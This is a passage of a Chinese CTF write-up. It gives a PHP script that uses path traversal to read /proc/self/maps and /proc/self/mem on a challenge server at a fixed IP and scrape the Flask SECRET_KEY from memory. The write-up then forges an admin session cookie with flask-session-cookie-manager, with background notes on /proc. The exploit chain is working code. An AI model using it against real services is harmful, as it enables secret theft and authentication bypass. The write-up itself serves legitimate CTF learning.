/usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so\n7fd78dc57000-7fd78dc58000 r-xp 00001000 fd:00 53478501 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so\n7fd78dc58000-7fd78dc59000 r--p 00002000 fd:00 53478501 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so\n7fd78dc59000-7fd78dc5a000 r--p 00002000 fd:00 53478501 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so\n7fd78dc5a000-7fd78dc5b000 rw-p 00003000 fd:00 53478501 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so\n7fd78dc5b000-7fd78dcf5000 rw-p 00000000 00:00 0 \n7fd78dcf5000-7fd78dcf7000 r--p 00000000 fd:00 53478479 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so\n7fd78dcf7000-7fd78dcfa000 r-xp 00002000 fd:00 53478479 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so\n7fd78dcfa000-7fd78dcfb000 r--p 00005000 fd:00 53478479 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so\n7fd78dcfb000-7fd78dcfc000 r--p 00006000 fd:00 53478479 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so\n7fd78dcfc000-7fd78dcfd000 r--p 00006000 fd:00 53478479 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so\n7fd78dcfd000-7fd78dcff000 rw-p 00007000 fd:00 53478479 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so\n7fd78dcff000-7fd78dd01000 r--p 00000000 fd:00 53478456 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so\n7fd78dd01000-7fd78dd03000 r-xp 00002000 fd:00 53478456 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so\n7fd78dd03000-7fd78dd04000 r--p 00004000 fd:00 53478456 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so\n7fd78dd04000-7fd78dd05000 r--p 00004000 fd:00 53478456 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so\n7fd78dd05000-7fd78dd06000 rw-p 00005000 fd:00 53478456 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so\n7fd78dd06000-7fd78dee8000 rw-p 00000000 00:00 0 \n7fd78dee8000-7fd78df47000 r--p 00000000 fd:00 53477940 /usr/local/lib/libpython3.7m.so.1.0\n7fd78df47000-7fd78e0e2000 r-xp 0005f000 fd:00 53477940 /usr/local/lib/libpython3.7m.so.1.0\n7fd78e0e2000-7fd78e18e000 r--p 001fa000 fd:00 53477940 /usr/local/lib/libpython3.7m.so.1.0\n7fd78e18e000-7fd78e194000 r--p 002a5000 fd:00 53477940 /usr/local/lib/libpython3.7m.so.1.0\n7fd78e194000-7fd78e1fc000 rw-p 002ab000 fd:00 53477940 /usr/local/lib/libpython3.7m.so.1.0\n7fd78e1fc000-7fd78e21d000 rw-p 00000000 00:00 0 \n7fd78e21d000-7fd78e232000 r--p 00000000 fd:00 53348198 /lib/ld-musl-x86_64.so.1\n7fd78e232000-7fd78e27a000 r-xp 00015000 fd:00 53348198 /lib/ld-musl-x86_64.so.1\n7fd78e27a000-7fd78e2b0000 r--p 0005d000 fd:00 53348198 /lib/ld-musl-x86_64.so.1\n7fd78e2b0000-7fd78e2b1000 r--p 00092000 fd:00 53348198 /lib/ld-musl-x86_64.so.1\n7fd78e2b1000-7fd78e2b2000 rw-p 00093000 fd:00 53348198 /lib/ld-musl-x86_64.so.1\n7fd78e2b2000-7fd78e2b5000 rw-p 00000000 00:00 0 \n7ffc29197000-7ffc291b8000 rw-p 00000000 00:00 0 [stack]\n7ffc291d7000-7ffc291da000 r--p 00000000 00:00 0 [vvar]\n7ffc291da000-7ffc291db000 r-xp 00000000 00:00 0 [vdso]\nffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0 [vsyscall]\n'
|
编写脚本获取secret_key
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
| <?php
if (version_compare(PHP_VERSION, '7.0.0', '<')) {
die("必须使用PHP 7.0及以上版本");
}
$url = "http://61.147.171.105:65402/";
$s_key = "";
$bypass = "../..";
class MockApp {
private $secret_key;
public function __construct($secret_key) {
$this->secret_key = $secret_key;
}
public function getSecretKey() {
return $this->secret_key;
}
}
abstract class FSCM {
public static function encode($secret_key, $session_cookie_structure) {
try {
$app = new MockApp($secret_key);
$session_data = json_decode($session_cookie_structure, true);
if (json_last_error() !== JSON_ERROR_NONE) {
throw new Exception("会话结构解析错误");
}
$serialized = json_encode($session_data);
return $serialized;
} catch (Exception $e) {
return "[编码错误] " . $e->getMessage();
}
}
}
$map_url = $url . "info?file={$bypass}/proc/self/maps";
$map_response = file_get_contents($map_url);
if ($map_response === false) {
die("无法获取maps信息");
}
$map_list = explode("\\n", $map_response);
foreach ($map_list as $line) {
if (preg_match('/([a-z0-9]+)-([a-z0-9]+) rw/', $line, $matches)) {
$start = hexdec($matches[1]);
$end = hexdec($matches[2]);
echo "找到可读写地址: " . $start . " - " . $end . "\n";
$mem_url = $url . "info?file={$bypass}/proc/self/mem&start={$start}&end={$end}";
$mem_response = file_get_contents($mem_url);
if ($mem_response === false) {
echo "无法读取mem内容: " . $mem_url . "\n";
continue;
}
if (strpos($mem_response, '*abcdefgh') !== false) {
if (preg_match_all('/[a-z0-9]{32}\*abcdefgh/', $mem_response, $secret_keys)) {
if (!empty($secret_keys[0])) {
echo "Secret Key: " . $secret_keys[0][0] . "\n";
$s_key = $secret_keys[0][0];
break;
}
}
}
}
}
?>
|
得到secret key: a8a85c112c604e84a1fe7ceddb69a658*abcdefgh
app.py源码中
1
| app.config['SECRET_KEY'] = f"{str(uuid.uuid4()).replace('-', '')}*abcdefgh"
|
其拼接的
接下来就是伪造session,访问/admin路径,抓包修改cookie
原始`session=eyJhZG1pbiI6MH0.aNFl8Q.SLMenYZTtG1FFllVRAKCoECNv7A
flask_session_cookie_manager下载和使用
还得利用一个工具flask_session_cookie_manager来伪造session
下载地址:GitHub - noraj/flask-session-cookie-manager: :cookie: Flask Session Cookie Decoder/Encoder需要有python2或者python3环境
使用
1
2
3
4
| 编码
python flask_session_cookie_manager3.py encode -s 'your_secret_key' -t '{"username": "admin", "number": "123456"}'
解码
python flask_session_cookie_manager3.py decode -c 'your_encoded_cookie' -s 'your_secret_key'
|
先将原来的session解码查看格式,再按照格式修改admin为1,利用编码获得新的session
burp抓包修改session
注:
可能会遇到的问题
注意最后修改的时候,如果动作太快会得不出flag。这是因为本地时间和服务器时间不一致,本地生成的session时间比较新,要过一段时间才能生效
补充知识
python存储对象的位置在堆上。app是个Flask对象
在 Flask 框架中,app 通常是 Flask 类的实例化对象,这是由 Flask 的设计理念和工作机制决定的,主要原因如下:
- Flask 是 “实例驱动” 的框架
Flask 采用 “一个应用对应一个实例” 的设计模式。Flask 类封装了 Web 应用的核心功能(如路由管理、请求处理、配置加载、模板渲染等),通过实例化 Flask 类,才能创建一个具备这些功能的 Web 应用实体。
例如,最基础的 Flask 应用代码:
1
2
3
4
5
6
7
8
9
| from flask import Flask
app = Flask(__name__)
@app.route('/')
def index():
return 'Hello World'
if __name__ == '__main__':
app.run()
|
这里的 app 就是 Flask 的实例,它是整个应用的 “入口” 和 “核心载体”。
proc/self
/proc 是 Linux 内核提供的一个虚拟文件系统(不占用实际磁盘空间),用于动态暴露内核状态、进程信息、硬件细节等数据。其中,/proc/[PID]/ 目录(如 /proc/1234/)专门存储 PID 为 1234 的进程的详细信息。
/proc/self/ 的特殊之处,/proc/self/ 是一个符号链接,它会动态指向当前访问该目录的进程对应的 /proc/[PID]/ 目录。
该目录下的文件 / 子目录均为虚拟文件,动态反映当前进程的实时状态,常见的有:
| 文件 / 目录 |
用途 |
cmdline |
存储进程启动时的命令行参数(以 null 字符分隔),例如 cat /proc/self/cmdline 可查看当前 cat 进程的命令行。 |
status |
包含进程的基本状态信息,如 PID、PPID(父进程 ID)、内存使用、运行状态(R/S/Z 等)、UID/GID 等。 |
environ |
存储进程的环境变量(以 null 字符分隔),例如 strings /proc/self/environ 可查看当前进程的环境变量。 |
fd/ |
子目录,包含进程打开的所有文件描述符的符号链接(如 fd/0 对应标准输入,fd/1 对应标准输出)。 |
cwd |
符号链接,指向进程当前的工作目录(Current Working Directory)。 |
exe |
符号链接,指向进程对应的可执行文件(如 /proc/self/exe 指向当前运行程序的路径)。 |
maps |
记录进程的内存映射信息,包括代码段、数据段、共享库等在内存中的地址范围。 |
stat |
以简洁格式存储进程的统计信息(如 CPU 占用时间、优先级等),适合程序解析。 |
bytes类型的decode()
前面b开头,是python中bytes类型,可以直接使用bytes的decode()方法
1
2
3
4
5
6
| a=b'abc\nabc'
print(a.decode())
用法
print(b'*****************'.decode())
|